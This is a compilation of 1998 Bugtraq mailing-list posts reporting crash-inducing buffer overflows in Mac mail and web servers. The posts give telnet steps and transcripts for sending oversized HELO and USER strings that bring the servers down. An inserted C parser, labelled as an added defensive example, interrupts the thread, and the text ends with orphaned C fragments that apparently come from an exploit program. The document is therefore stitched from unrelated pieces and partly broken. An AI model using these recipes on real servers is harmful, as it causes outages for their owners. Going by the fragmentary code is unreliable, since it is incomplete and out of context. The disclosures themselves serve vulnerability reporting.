
Mac appleshare stalker smtp overflows


Date: Wed, 8 Apr 1998 13:11:17 +1200
From: Chris Wedgwood <chris@CYBERNET.CO.NZ>
To: BUGTRAQ@NETSPACE.ORG
Subject: AppleShare IP Mail Server

[Yet another buffer overrun? - I hope this isn't getting monotonous]

I noticed this a while back but haven't seen anyone else mention it.


There appears to be what looks like a buffer overrun problem with AppleShare
IP Mail Server.

If you connect to the SMTP port and issue a long string (say 500 bytes or
so) the server crashes - and because it's a Mac, it usually crashes the whole
machine to the point where it needs a reboot.

So far I've only tested against servers which emit the banner 'AppleShare IP
Mail Server 5.0.3'

For example:


$ telnet some.where
Trying 1.2.3.4...
Connected to some.where.
Escape character is '^]'.
220 some.where AppleShare IP Mail Server 5.0.3 SMTP Server Ready
HELO XXXXXXXXXXX[....several hundred of these....]XXXXXXXX
[ and it just hangs ]

$ ping some.where
[ ...nothing... ]


Physically checking the machine shows it has `locked up' and it needs a reboot. I
assume if you can cause a crash without the lockup then you might be able to
execute code and do something useful (on a Mac?).




-cw
Date: Wed, 8 Apr 1998 12:34:09 +0800
From: David Luyer <luyer@UCS.UWA.EDU.AU>
To: BUGTRAQ@NETSPACE.ORG
Subject: Re: AppleShare IP Mail Server

Chris Wedgwood wrote:

> 220 some.where AppleShare IP Mail Server 5.0.3 SMTP Server Ready
> HELO XXXXXXXXXXX[....several hundred of these....]XXXXXXXX
> [ and it just hangs ]

Same with

220-Stalker Internet Mail Server V.1.6 is ready.
220 ESMTP is spoken here.
HELO xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
[dead]

But then, isn't that expected of using toy machines (Macs/Win PCs) for servers?

David.
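
A defensive counterpart to the two HELO reports above, added here as an example and not part of the original posts or of any vendor's code: a C parser that bounds the command line at the RFC 5321 limit of 512 octets and checks the argument length before any copy. The function names, buffer sizes and probe lengths are assumptions made for illustration.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>
#include <strings.h>

#define SMTP_LINE_MAX 512  /* RFC 5321 4.5.3.1.4: command line, CRLF included */
#define DOMAIN_MAX    255  /* RFC 5321 4.5.3.1.2: domain name */

/* Parse one HELO line from len received bytes into domain[domain_sz].
 * Returns the reply code to send: 250 accepted, 500 no CRLF within the line
 * limit, 501 bad or oversized argument, 502 not a HELO command. */
int parse_helo(const char *buf, size_t len, char *domain, size_t domain_sz)
{
    size_t scan = len < SMTP_LINE_MAX ? len : SMTP_LINE_MAX;
    size_t i, n = scan;                  /* n == scan means "no CRLF found" */

    for (i = 0; i + 1 < scan; i++)       /* never look past the line limit */
        if (buf[i] == '\r' && buf[i + 1] == '\n') { n = i; break; }
    if (n == scan) return 500;           /* caller discards up to next CRLF */
    if (n < 5 || strncasecmp(buf, "HELO ", 5) != 0) return 502;
    buf += 5; n -= 5;
    if (n == 0 || n > DOMAIN_MAX || n >= domain_sz)
        return 501;                      /* length is checked before the copy */
    for (i = 0; i < n; i++) {
        unsigned char c = (unsigned char)buf[i];
        if (!isalnum(c) && (c == '\0' || !strchr(".-[]:", c)))
            return 501;                  /* only hostname/address-literal bytes */
    }
    memcpy(domain, buf, n);
    domain[n] = '\0';
    return 250;
}

/* Constructed probe: "HELO " + nfill 'X' bytes + CRLF, as in the reports. */
int reply_for_fill(size_t nfill)
{
    static char line[2048];
    char domain[DOMAIN_MAX + 1];
    if (nfill > sizeof line - 8) return -1;
    memcpy(line, "HELO ", 5);
    memset(line + 5, 'X', nfill);
    memcpy(line + 5 + nfill, "\r\n", 2);
    return parse_helo(line, nfill + 7, domain, sizeof domain);
}

int main(void) {
    printf("%d %d %d\n", reply_for_fill(11), reply_for_fill(300), reply_for_fill(600));
    return 0;
}
```
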

Date: Tue, 14 Apr 1998 10:01:05 -0400 (EDT)
From: Netstat Webmaster <feh@netstat.net>
Subject: MacOS based buffer overflows...


Eudora Internet Mail Server vs. 1.2, 2.0, 2.01 DoS

Telnet to port 106 of an EIMS server.
Type USER xxxxxxxxxxxx(at least a 1000+ char string).  EIMS will crash.
Occasionally taking the entire machine with it.

---

Apple's Web Sharing DoS

Telnet to port 80 of a Web Sharing server (built into system 8.0+).
Upon connect enter any string of at least 3000+ characters.  Hit return
twice, Web Sharing will stop servicing.  It does not seem to make the
server any less stable and Web Sharing seems to be able to be restarted
without a reboot and without any ill effects.

Phanty.

     printf("usage: %s <smtp server>\n", argv[0]);
     exit(1);
     printf("Unknown host: %s\n",argv[1]);
     exit(1);
